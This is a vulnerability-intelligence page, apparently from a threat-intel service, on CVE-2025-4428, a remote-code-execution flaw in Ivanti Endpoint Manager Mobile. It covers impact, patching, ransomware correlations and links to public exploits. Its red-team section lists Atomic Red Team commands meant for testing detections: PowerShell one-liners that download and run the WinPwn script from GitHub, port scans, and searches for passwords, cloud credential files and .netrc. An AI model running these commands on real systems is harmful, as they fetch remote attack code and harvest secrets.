CVE-2025-4428
Overview
This vulnerability is a server-side template injection (SSTI) resulting from improper handling of expression language inputs within the API component of Ivanti Endpoint Manager Mobile. The root cause lies in insufficient sanitization and validation of crafted API requests containing malicious code expressions. The affected component is the mobile management API in versions 12.5.0.0 and earlier, which processes user-supplied data in server-side templates without adequate security controls.
Vulnerability Description
Remote Code Execution in API component in Ivanti Endpoint Manager Mobile 12.5.0.0 and prior on unspecified platforms allows authenticated attackers to execute arbitrary code via crafted API requests.
Impact
An attacker with valid high-privilege credentials can execute arbitrary code on the server hosting Ivanti Endpoint Manager Mobile, enabling full system compromise. This includes executing system commands, accessing sensitive data, or disrupting services managed by the platform. The prerequisite is possession of authenticated access with elevated privileges, making it a critical threat in environments where credential exposure or insider threats exist. Successful exploitation can lead to lateral movement within enterprise networks and compromise of managed mobile devices.
Solution
Ivanti has published a security advisory addressing this issue for Ivanti Endpoint Manager Mobile versions up to 12.5.0.0. Users should apply the vendor-released patches available in the advisory found at https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM. The advisory provides detailed patch instructions and recommends upgrading to fixed versions beyond 12.5.0.0. No alternative workarounds are specified; applying the official update is required to remediate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
akira
|
LOW | 1529 | Chain Inference |
|
ransomhub
|
LOW | 842 | Chain Inference |
|
sinobi
|
LOW | 274 | Chain Inference |
|
frag
|
LOW | 30 | Chain Inference |
|
0apt
|
LOW | — | Chain Inference |
Full Analysis
The vulnerability in the API component of Ivanti Endpoint Manager Mobile versions up to 12.5.0.0 presents a significant risk due to its potential for remote code execution. This flaw allows authenticated attackers to craft specific API requests that can lead to the execution of arbitrary code on the server. The underlying issue stems from improper validation of input parameters, which can be exploited to manipulate the behavior of the application. This vulnerability highlights a critical failure in the security posture of the affected product, as it permits unauthorized actions that could compromise the integrity and confidentiality of the system.
Attack vectors for this vulnerability are particularly concerning, as they enable exploitation by individuals who have already gained authenticated access to the system. This could occur through various means, such as phishing attacks, credential stuffing, or insider threats. Once an attacker has authenticated, they can leverage the crafted API requests to execute malicious code, potentially leading to a complete takeover of the affected system. Scenarios may include deploying malware, exfiltrating sensitive data, or disrupting services, all of which can have devastating consequences for organizations relying on this endpoint management solution.
The real-world impact of this vulnerability is profound, especially for organizations that utilize Ivanti Endpoint Manager Mobile for managing mobile devices and applications. The ability to execute arbitrary code remotely can lead to significant business risks, including data breaches, loss of customer trust, and regulatory penalties. Organizations in sectors such as finance, healthcare, and government, where sensitive data is handled, are particularly vulnerable. The financial implications of a successful exploit can be severe, with costs associated with incident response, legal liabilities, and potential loss of business due to reputational damage.
To effectively detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the affected software to the latest version is crucial, as vendors typically release patches to address known vulnerabilities. Additionally, organizations should conduct thorough security assessments and penetration testing to identify potential weaknesses in their configurations and access controls. Implementing robust logging and monitoring solutions can aid in detecting anomalous API requests, allowing for timely responses to potential exploitation attempts. Furthermore, educating employees about security best practices, including recognizing phishing attempts and safeguarding credentials, can help reduce the likelihood of unauthorized access.
In conclusion, the vulnerability in the API component of Ivanti Endpoint Manager Mobile poses a serious threat to organizations that utilize this software. The potential for remote code execution through crafted API requests underscores the importance of maintaining a strong security posture and staying vigilant against emerging threats. By adopting proactive detection and mitigation strategies, organizations can protect themselves from the risks associated with this vulnerability and ensure the integrity of their endpoint management systems.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2025-4428, reflected by a significant increase in detection activity and a sharply rising Exploit Prediction Scoring System (EPSS) score. This upward trend signals growing adversary interest and operationalization of the vulnerability, further underscored by the emergence of an additional ransomware group now linked to exploitation efforts. The availability of new proof-of-concept exploits, including an unauthenticated remote code execution chain integrated into widely used penetration testing frameworks, lowers the barrier for threat actors to weaponize this flaw. Consequently, the threat landscape has intensified, elevating the risk to organizations deploying Ivanti Endpoint Manager Mobile. The convergence of increased exploitation activity, expanding ransomware group involvement, and publicly accessible exploit tools necessitates heightened vigilance, as the likelihood of successful compromise and subsequent impact has materially increased.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanti | Endpoint Manager Mobile | All |
cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager Mobile | All |
cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager Mobile | All |
cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*
|
|
|
Ivanti | Endpoint Manager Mobile | 12.5.0.0 |
cpe:2.3:a:ivanti:endpoint_manager_mobile:12.5.0.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (2)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Commvault Command-Line Argument Injection to Traversal Remote Code Execution
exploits/windows/http/commvault_rce_cve_2025_57790_cve_2025_57791
|
Sonny Macdonald, Piotr Bazydlo, remmons-r7 | Unknown | windows | View |
|
Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution
exploits/multi/http/ivanti_epmm_rce_cve_2025_4427_4428
|
CERT-EU, Sonny Macdonald, Piotr Bazydlo +1 | Unknown | python | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
xie-22/CVE-2025-4428
Ivanti EPMM Pre-Auth RCE Chain
|
xie-22 | 4 | 3 | 2025-05-16 | View |
Ransomware Groups 5
Threat Feed
12 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (30 known victims)
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability (274 known victims)
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-4428 |
| forums.ivanti.com |
GitHub CVE
|
https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-4428 |